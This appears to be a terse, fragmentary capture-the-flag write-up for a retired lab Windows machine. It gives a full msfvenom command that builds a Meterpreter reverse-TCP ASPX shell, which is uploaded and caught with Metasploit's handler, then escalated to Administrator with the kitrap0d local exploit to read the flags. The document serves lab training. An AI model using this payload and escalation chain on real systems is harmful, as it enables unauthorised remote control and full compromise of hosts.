Retired Easy Machine by ch4p
put shell.aspx
to upload msfvenom shell.
msfvenom command used,
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LAB IP> LPORT=<PORT> -f aspx > shell.aspx
/multi/handler
to get reverse tcp connection from the shell on metasploit as user IIS APPPOOL\Web
.local_exploit_suggester
module for this.exploit/windows/local/ms10_015_kitrap0d
worked. The flags can now be obtained from
c:\Users\babis\Desktop\user.txt.txt
and c:\Users\Administrator\Desktop\root.txt.txt
Author: Zishan Ahamed Thandar